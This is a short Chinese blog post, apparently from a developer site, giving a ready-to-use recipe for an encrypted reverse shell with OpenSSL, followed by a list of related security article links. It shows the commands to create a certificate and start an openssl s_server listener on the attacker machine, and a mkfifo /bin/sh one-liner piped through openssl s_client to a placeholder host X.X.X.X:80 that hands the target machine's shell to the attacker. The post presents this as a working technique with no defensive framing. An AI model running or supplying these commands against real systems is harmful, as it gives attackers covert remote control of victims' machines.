使用OpenSSL的反弹shell

1、攻击机生成证书:

powershell 复制代码
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

2、攻击机开启服务

powershell 复制代码
openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

powershell 复制代码
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行

靶机交出控制权

其他反弹shell命令

参见我的其他文章

相关推荐
儒道易行几秒前
【DVWA】RCE远程命令执行实战
网络·安全·网络安全
中云DDoS CC防护蔡蔡5 小时前
微信小程序被攻击怎么选择高防产品
服务器·网络安全·微信小程序·小程序·ddos
.Ayang13 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang13 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
风间琉璃""15 小时前
二进制与网络安全的关系
安全·机器学习·网络安全·逆向·二进制
Che_Che_16 小时前
Cross-Inlining Binary Function Similarity Detection
人工智能·网络安全·gnn·二进制相似度检测
恃宠而骄的佩奇17 小时前
i春秋-签到题
web安全·网络安全·蓝桥杯
follycat18 小时前
信息收集--CDN绕过
网络·安全·网络安全
清风.春不晚20 小时前
shell脚本2---清风
网络·网络安全